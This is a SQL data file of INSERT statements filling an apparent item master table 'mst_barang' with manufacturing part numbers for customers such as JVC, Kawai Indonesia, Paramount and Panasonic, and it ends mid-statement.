INSERT INTO mst_barang VALUES ('WJI-0038', '11', '', 'LV35331-003A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0039', '11', '', 'LV37016-201A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0040', '11', '', 'LV37858-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0041', '11', '', 'LV37859-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0042', '11', '', 'LV37875-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0043', '11', '', 'LV37896-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0044', '11', '', 'LV37970-01A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0045', '11', '', 'LV38527-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0046', '11', '', 'LV38882-001MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0047', '11', '', 'LV38882-003BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0048', '11', '', 'LV38883-001', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0049', '11', '', 'LV39078-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0050', '11', '', 'LV39126-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0051', '11', '', 'LV39126-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0052', '11', '', 'LV39538-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0053', '11', '', 'LV39607-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0054', '11', '', 'LV42152-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0055', '11', '', 'LV43349-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0056', '11', '', 'LV43967-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0057', '11', '', 'LV43968-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0058', '11', '', 'LV44335-001ABA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0059', '11', '', 'VKL7059-002S', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0060', '11', '', 'LV44972-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WKI-0001', '11', '', 'APFB-0003', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0002', '11', '', 'KLFB-0014', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0003', '11', '', 'KLFB-0017', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0004', '11', '', 'KMFB-0170', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0005', '11', '', 'KMFB-0210', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0006', '11', '', 'KMFB-0217', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0007', '11', '', 'KPFB-0260 Rev : 100', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0008', '11', '', 'KPFB-0260 Rev : 102', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0009', '11', '', 'KPFB-0318', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0010', '11', '', 'KPFB-0457', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0011', '11', '', 'KPFB-0547', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0012', '11', '', 'KPFB-0568/KPFB-0378BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0013', '11', '', 'KPFB-0568/KPFB-0378MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0014', '11', '', 'KPFB-1070', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0015', '11', '', 'KPFB-0590 Rev101L=60 WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0016', '11', '', 'KPFB-0590 Rev102L=90 WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0017', '11', '', 'KPFB-0590 Rev102L=120 WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0018', '11', '', 'KPFB-0590 Rev102L=150 WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0019', '11', '', 'KPFB-0612', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0020', '11', '', 'KPFB-0799', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0021', '11', '', 'KPFB-0801', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0022', '11', '', 'KPFB-0850', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0023', '11', '', 'KPFB-0851', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0024', '11', '', 'KPFB-0960', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0025', '11', '', 'KPFB-0961', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0026', '11', '', 'KPFB-1030', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0027', '11', '', 'KPFB-1046', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0028', '11', '', 'KPFB-1073', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKI-0029', '11', '', 'KPFB-1075', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('WKS-0001', '11', '', '5010-102-231-12', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KASEN'); INSERT INTO mst_barang VALUES ('WKS-0002', '11', '', '5010-102-233-11', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KASEN'); INSERT INTO mst_barang VALUES ('WKS-0003', '11', '', '5010-312-430-12', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KASEN'); INSERT INTO mst_barang VALUES ('WKS-0004', '11', '', '5010-312-381-11', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KASEN'); INSERT INTO mst_barang VALUES ('WKS-0005', '11', '', '5010-404-227-12', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KASEN'); INSERT INTO mst_barang VALUES ('WKT-0001', '11', '', 'APFB-0003', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('WKT-0002', '11', '', 'KLFB-0014', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('WKT-0003', '11', '', 'KPFB-0260 REV 102', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('WKT-0004', '11', '', 'KPFB-0547 L=90 mm', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('WKT-0005', '11', '', 'KPFB-0590 Rev102 L= 60 mm (White Anodize)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('WKT-0006', '11', '', 'KPFB-0590 Rev102 L= 90 mm (White Anodize)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('WKT-0007', '11', '', 'KPFB-0590 Rev102 L= 120 mm (White anodize)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('WKT-0008', '11', '', 'KPFB-0612', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('WKT-0009', '11', '', 'KPFB-1073', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('WKT-0010', '11', '', 'KPFB-1075', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('WKT-0011', '11', '', 'KPFB-0960', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('WKT-0012', '11', '', 'KPFB-0961', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('WLT-0001', '11', '', 'AT-0606-02-00(L=296)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('WLT-0002', '11', '', 'AT-0606-02-00(L=446)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('WLT-0003', '11', '', 'AT-0606-02-00(L=596)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('WLT-0004', '11', '', 'AT-0606-11-00(L=296)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('WLT-0005', '11', '', 'AT-0606-11-00(L=446)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('WLT-0006', '11', '', 'AT-0606-11-00(L=596)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('WLT-0007', '11', '', 'AT-0607-02-00(L=446)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('WLT-0008', '11', '', 'AT-0607-02-00(L=896)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('WLT-0009', '11', '', 'AT-0607-02-00(L=1196)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('WLT-0010', '11', '', 'AT-0607-05-00(L=418)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('WLT-0011', '11', '', 'AT-0607-06-00(L=391)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('WLT-0012', '11', '', 'AT-0607-15-00(L=446)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('WLT-0013', '11', '', 'AT-0607-15-00(L=896)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('WLT-0014', '11', '', 'AT-0607-15-00(L=1196)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('WPB-0001', '11', '', '3F-00000S1', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0002', '11', '', '3F-00000S2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0003', '11', '', '3F-00000S2 ANODIZE', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0004', '11', '', '3F-01628300AO-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0005', '11', '', '3F-016289', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0006', '11', '', '3F-017905', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0007', '11', '', '3F-050235', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0008', '11', '', '3F-06905200A1-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0009', '11', '', '3F-06905300A1-001', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0010', '11', '', '3F-06905500A1-002', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0011', '11', '', '3F-06905700A1-003', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0012', '11', '', '3F-06971800AO-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0013', '11', '', '3F-06971800AO-001', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0014', '11', '', '3F-06971800AO-002', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0015', '11', '', '3F-07001400AO-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0016', '11', '', '3F-070015 MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0017', '11', '', '3F-07001500A0-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0018', '11', '', '3F-07001500B0-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0019', '11', '', '3F-07001500C2-000MOK', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0020', '11', '', '3F-070016 MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0021', '11', '', '3F-07001600A0-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0022', '11', '', '3F-07001600B0-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0023', '11', '', '3F-07001600C2-000MOAK', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0024', '11', '', '3F-076636', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0025', '11', '', '3F-076637', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0026', '11', '', '3F-076639', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0027', '11', '', '3F-077147 SB', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0028', '11', '', '3F-077155 SB', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0029', '11', '', '3F-077156 SB', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0030', '11', '', '3F-077479', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0031', '11', '', '3F-078383', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0032', '11', '', '3F-08201400AO-000 ( L=617)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0033', '11', '', '3F-090350', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0034', '11', '', '3K-00045300A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0035', '11', '', '3K-00822400A2-0002FINISH', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0036', '11', '', '3K-00822400A2-0002MATERIAL', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0037', '11', '', '3K-01064300A3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0038', '11', '', '3K-010644-00A0(L=2940)-YS', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0039', '11', '', '3K-010644-00B0-0001-YS', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0040', '11', '', '3K-01064500AO-0001', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0041', '11', '', '3K-010645NA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0042', '11', '', '3K-01064600A2-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0043', '11', '', '3K-010646E', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0044', '11', '', '3K-01064700A1-1/21', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0045', '11', '', '3K-010648', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0046', '11', '', '3K-01181800AO-0001', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0047', '11', '', '3K-015326', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0048', '11', '', '3K-015327', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0049', '11', '', '3K-015328', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0050', '11', '', '3k-082014-00', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0051', '11', '', '3S000007', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0052', '11', '', '3S000008', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0053', '11', '', 'MAOR0014 ( nut )', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0054', '11', '', 'MAOR001500A1-000 ( 19.6)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0055', '11', '', 'MAOR001600A1-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0056', '11', '', 'MAPB-001701', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0057', '11', '', 'MAPB-001701A1-000/headrallright', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0058', '11', '', 'MAPB-001702A1-000/headrallleft', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0059', '11', '', 'PBC00001000AO', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0060', '11', '', 'Pipe dia 9.5mm L=697mm/3F0821000AO-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPB-0061', '11', '', 'WPSP-0008', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('WPG-0001', '11', '', 'FL0501-07-00/BaseIL600', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC GOBEL'); INSERT INTO mst_barang VALUES ('WPG-0002', '11', '', 'FL0502-07-00/BaseIL900', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC GOBEL'); INSERT INTO mst_barang VALUES ('WPG-0003', '11', '', 'I-10758-1(CaseA)O3.72', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC GOBEL'); INSERT INTO mst_barang VALUES ('WPG-0004', '11', '', 'FZ322959121.2(CaseB)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC GOBEL'); INSERT INTO mst_barang VALUES ('WPG-0005', '11', '', 'NKB50-1128-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC GOBEL'); INSERT INTO mst_barang VALUES ('WPG-0006', '11', '', 'YJI-001 BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC GOBEL'); INSERT INTO mst_barang VALUES ('WPH-0001', '11', '', 'LSCC0854 ', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0002', '11', '', 'LSEK00780-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0003', '11', '', 'LSEK00781', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0004', '11', '', 'LSEK00782', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0005', '11', '', 'LSEK00783-1', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0006', '11', '', 'LSEK0849', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0007', '11', '', 'LSEK0851', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0008', '11', '', 'LSEK0881', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0009', '11', '', 'LSEK0882', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0010', '11', '', 'LSEK0883', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0011', '11', '', 'LSEK0884', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0012', '11', '', 'LSEK0894', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0013', '11', '', 'LSEK0922', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0014', '11', '', 'LSEK0938', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0015', '11', '', 'LSEK0939', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0016', '11', '', 'LSEK0940', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0017', '11', '', 'LSEK0941', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0018', '11', '', 'LSEK0942', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0019', '11', '', 